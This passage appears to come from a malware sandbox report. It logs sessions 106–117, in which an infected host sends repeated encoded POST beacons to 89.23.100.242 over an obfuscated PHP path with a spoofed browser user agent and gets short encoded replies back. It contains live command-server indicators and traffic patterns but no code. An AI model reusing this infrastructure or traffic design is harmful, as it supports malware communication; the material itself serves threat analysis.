                                                                                                Data Raw: 39 38 0d 0a 0f 1e 3a 0f 20 15 3c 1c 32 3c 29 52 3a 01 03 1a 28 20 38 5a 3e 3d 0e 03 2b 23 09 54 2e 06 27 10 21 15 39 1b 3f 1c 3e 19 24 3c 23 0e 32 0d 21 59 0c 13 26 5b 3d 39 31 1e 28 29 20 59 2b 32 22 07 30 33 0d 5b 25 3e 3e 09 37 3c 30 5a 3e 3a 29 55 28 1f 25 57 2c 2a 2c 5f 2a 2f 34 1f 27 1c 2a 57 0c 1f 26 56 22 0c 35 1d 22 21 21 02 33 06 06 0c 30 2b 20 56 24 2c 2b 5a 21 3a 24 01 39 29 28 10 35 07 24 1c 3d 3e 3a 57 22 22 0d 08 2b 16 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98: <2<)R:( 8Z>=+#T.'!9?>$<#2!Y&[=91() Y+2"03[%>>7<0Z>:)U(%W,*,_*/4'*W&V"5"!!30+ V$,+Z!:$9)(5$=>:W""+ Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                106192.168.2.45011389.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:05.207210064 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:05.564120054 CET2544OUTData Raw: 5c 56 46 52 5e 57 56 52 58 5b 57 56 50 5f 5b 57 55 54 5e 58 54 51 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFR^WVRX[WVP_[WUT^XTQQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/23]?-\?]8)-?[8X?;'#4P++*/52?0'_!/Y.9
                                                                                                Jan 10, 2025 07:59:05.944292068 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:06.073045015 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:05 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                107192.168.2.45011489.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:06.205147982 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:06.564106941 CET2544OUTData Raw: 59 50 43 53 5e 5d 56 54 58 5b 57 56 50 52 5b 57 55 55 5e 5b 54 5d 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPCS^]VTX[WVPR[WUU^[T]QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,1$+--_(6(Z/:+#?6$;W+?Y=*1=]$'_!/Y.
                                                                                                Jan 10, 2025 07:59:06.958594084 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:07.092672110 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                108192.168.2.45011589.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:07.221076965 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:07.579878092 CET2544OUTData Raw: 59 51 43 57 5b 5d 56 5f 58 5b 57 56 50 5e 5b 53 55 5d 5e 5f 54 5a 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCW[]V_X[WVP^[SU]^_TZQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@,2'X(=%?$X,*"?=,X(8["7;U+4)?:F%X''_!/Y.=
                                                                                                Jan 10, 2025 07:59:07.964337111 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:08.122549057 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                109192.168.2.45011689.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:08.253855944 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:08.611063004 CET2544OUTData Raw: 5c 56 43 50 5b 5b 56 5e 58 5b 57 56 50 5d 5b 52 55 55 5e 5d 54 59 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VCP[[V^X[WVP][RUU^]TYQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,20(><54X/:%V<=(Y+(]"?W(0?X*/-%.'$'_!/Y.1
                                                                                                Jan 10, 2025 07:59:09.103215933 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:09.232789040 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                110192.168.2.45011789.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:09.366720915 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:09.720398903 CET2544OUTData Raw: 59 5f 43 55 5e 5a 53 53 58 5b 57 56 50 58 5b 50 55 50 5e 5e 54 50 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CU^ZSSX[WVPX[PUP^^TPQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/"8([:<7,)=W>=+80#$/?3<==2=+0:'_!/Y.%
                                                                                                Jan 10, 2025 07:59:10.283348083 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:10.284368992 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0
                                                                                                Jan 10, 2025 07:59:10.284399986 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:10 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                111192.168.2.45011889.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:10.410666943 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:10.767287970 CET2544OUTData Raw: 5c 51 43 5f 5b 5b 56 55 58 5b 57 56 50 5e 5b 55 55 57 5e 59 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QC_[[VUX[WVP^[UUW^YTQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/+Y(>-^< X,.(>$_?8"*0+Y*Y9$=(Y$'_!/Y.=


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                112192.168.2.45011989.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:10.976708889 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:11.329791069 CET2036OUTData Raw: 5c 54 43 5e 5e 58 56 52 58 5b 57 56 50 52 5b 56 55 52 5e 5b 54 59 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TC^^XVRX[WVPR[VUR^[TYQRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/!((^<6?-*1(=$\+(<"47T+#?Z*Y"G1+&*'_!/Y.
                                                                                                Jan 10, 2025 07:59:11.816303968 CET374INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 39 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0f 1e 39 52 20 2b 23 0c 25 06 22 0c 2e 2f 22 09 3f 1e 24 59 29 13 34 00 2b 33 33 53 2c 3f 09 10 20 3b 0b 5e 2b 32 2e 57 24 12 23 0f 26 0d 21 59 0c 13 26 58 2b 03 25 57 3d 2a 24 11 28 32 3e 44 26 23 34 07 33 5b 2d 51 20 11 2f 07 3f 2a 29 19 3c 32 3a 0d 2c 2a 23 07 2a 02 2f 0c 33 36 2a 57 0c 1f 26 1e 22 22 35 51 22 0c 2e 5a 30 38 23 1d 30 01 20 57 31 2f 24 05 21 2a 2b 12 2e 3a 2b 02 23 3d 23 03 2a 07 2e 52 23 22 33 0c 2b 16 20 51 22 0d 22 50 [TRUNCATED]
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:59:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989R +#%"./"?$Y)4+33S,? ;^+2.W$#&!Y&X+%W=*$(2>D&#43[-Q /?*)<2:,*#*/36*W&""5Q".Z08#0 W1/$!*+.:+#=#*.R#"3+ Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                113192.168.2.45012089.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:11.101484060 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:11.454806089 CET2544OUTData Raw: 59 5f 43 56 5e 5e 56 54 58 5b 57 56 50 5a 5b 57 55 50 5e 5e 54 5f 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CV^^VTX[WVPZ[WUP^^T_QSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,,+2>%;/:( \?$"/?*/2+$'_!/Y.-
                                                                                                Jan 10, 2025 07:59:11.908229113 CET225INHTTP/1.1 100 Continue
                                                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 39 3a 31 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:59:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                114192.168.2.45012189.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:12.049834013 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:59:12.407872915 CET2544OUTData Raw: 5c 55 43 53 5e 5b 56 5e 58 5b 57 56 50 59 5b 56 55 5d 5e 58 54 58 51 53 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UCS^[V^X[WVPY[VU]^XTXQSRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,?X>-^(8X,**+.8_<+#"B((+*<:A23:'_!/Y.!
                                                                                                Jan 10, 2025 07:59:12.808871984 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:12.944700003 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                115192.168.2.45012289.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:13.065357924 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:13.423511028 CET2536OUTData Raw: 5c 55 46 57 5b 5b 56 51 58 5b 57 56 50 5b 5b 55 55 5d 5e 5a 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \UFW[[VQX[WVP[[UU]^ZT[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@8W3Y>-2<P$,:)?.;?;!4Q+U()?2> ^$*'_!/Y.1
                                                                                                Jan 10, 2025 07:59:13.819375038 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:13.956799030 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                116192.168.2.45012389.23.100.24280
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:59:14.079814911 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:59:14.439152956 CET2536OUTData Raw: 5c 56 46 50 5e 5e 56 52 58 5b 57 56 50 5b 5b 50 55 54 5e 5d 54 58 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VFP^^VRX[WVP[[PUT^]TXQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;1#Y>-.>6'89S(=;<+ X#$*34**%$]$'_!/Y.%
                                                                                                Jan 10, 2025 07:59:14.823292017 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:59:14.974802971 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:59:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                117192.168.2.45012489.23.100.24280
